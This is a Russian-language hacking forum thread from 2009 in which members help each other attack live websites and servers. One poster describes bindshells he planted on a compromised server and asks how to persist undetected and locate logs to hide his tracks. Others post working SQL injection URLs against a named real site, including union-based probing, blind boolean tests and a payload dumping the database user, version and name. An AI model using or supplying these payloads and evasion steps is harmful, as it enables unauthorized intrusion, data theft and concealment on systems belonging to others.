Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Не, ну шутки шутками. Объясните мне пожалуйста, почему меня пустило в админку введением одного логина: root. Поле пароля пустое. Это недоработка webmina? Или я чтото сделал своими слабенькими манипуляциями?
     
  2. treekool

    treekool New Member

    Joined:
    5 Jul 2008
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    А пароль вообще стоял?
     
  3. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Поглядел логи chkrootkit на порутаном серве и увидел
    Bindshell infected (port 31337 (мой бинд)) , но я забиндил ещё один порт 31333 и он его почемуто не пропас,хотя в нетсат он ЛИСЕН. Работаю по второму порту.
    Как закрыть забинденный мной порт и без палева закрепиться в системе при таких условиях?
    И ещё,где в линухе лежит исторя команд и лог моих подключений на мои порты?
    В var/log не нашёл =(
     
    #9663 p.r0phe.t, 1 Nov 2009
    Last edited: 1 Nov 2009
  4. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Можно поподробней о этом? (+ с примером если можно)
    milw0rm.com/papers/359 - не знаю англ язык

    (strtolower не должен влиять на Null байт по идее?)
     
    #9664 wolmer, 1 Nov 2009
    Last edited: 1 Nov 2009
  5. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Почитай данную статью . =)
     
  6. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Что-то не получается заюзать (с точкой), нужен пример с POST'ом
     
  7. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    а самому подумать?
    в %00 - нет буквенных символов , чтоб переводить в нижний регистр
     
  8. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Увереность не помешает
     
    #9668 wolmer, 1 Nov 2009
    Last edited: 1 Nov 2009
  9. [QwyZ]

    [QwyZ] Banned

    Joined:
    7 Jul 2009
    Messages:
    71
    Likes Received:
    27
    Reputations:
    5
    короч нашел на одном интересном сайте как я понимаю инжект в скулю.дело в том что скульинж я плохо понимаю так как со скулью неработаю.вобщем посоветуте ЧТО и каким образом можно извлечь из вот такого варнинга:

    « MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
    « Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>' at line 1 »
    SQL: SELECT DISTINCT sc.id, sc.pagetitle, sc.longtitle, sc.description FROM `uХХХХХХХ_main`.`ХХХ_site_content` sc LEFT JOIN `uХХХХХХ_main`.`ХХХ_site_tmplvar_contentvalues` stc ON sc.id = stc.contentid WHERE (sc.pagetitle LIKE '%\\">\\'>sc\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>sc\\">%' OR sc.content LIKE '%\\">\\'>sc\\">%' OR stc.value LIKE '%\\">\\'>sc\\">%') AND sc.privateweb=0 AND sc.published=1 AND sc.searchable=1 AND sc.deleted=0;



    вводил в поле поиска - ">'>sc"><
     
    1 person likes this.
  10. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    скуль, не? причем с кривым экранированием
     
  11. [QwyZ]

    [QwyZ] Banned

    Joined:
    7 Jul 2009
    Messages:
    71
    Likes Received:
    27
    Reputations:
    5
    ну дак я про это и говорю - а толко че с этим далше делать - хз,я в скулях нерублю
     
    #9671 [QwyZ], 1 Nov 2009
    Last edited: 1 Nov 2009
  12. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    читай маны ;)
    например тут:
    или тут:
     
    #9672 gisTy, 1 Nov 2009
    Last edited: 1 Nov 2009
  13. acdel

    acdel Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    131
    Likes Received:
    57
    Reputations:
    3
    Wordpress 2.5

    При обращении к файлу

    http://localhost/blog/wp-includes/class-feed.php

    имеем

    Можно это как-то раскрутить, без параметра?
     
  14. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Тебе вот сюда . :)
     
  15. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    я думаю, что нет
     
  16. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Прошу помощи. Нашёл следующую скулю:
    Code:
    http://www.bmx.ru/files.php?id=1'
    Подбираю поля. Дохожу до шести, используя в качестве комментария символ "--". Выходит следующее:
    Code:
    http://www.bmx.ru/files.php?id=1+union+select+1,1,1,1--
    Пробую подобрать дальше, выскакивает другая ошибка:
    Это не операбельно, или у меня совсем мозг не работает уже?
     
  17. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    думаю ее просто нужно крутить как слепую

    Code:
    http://www.bmx.ru/files.php?id=1+and+1=1+--+
    Code:
    http://www.bmx.ru/files.php?id=1+and+1=0+--+
     
    2 people like this.
  18. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Я тоже об этом думал. Раз нет других вариантов - буду так. Большое спасибо!
     
  19. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    keng
    как вариант:
    Code:
    http://www.bmx.ru/foto.php?al_id=-17+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6--
     
    2 people like this.
  20. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Благодарю!
     
Thread Status:
Not open for further replies.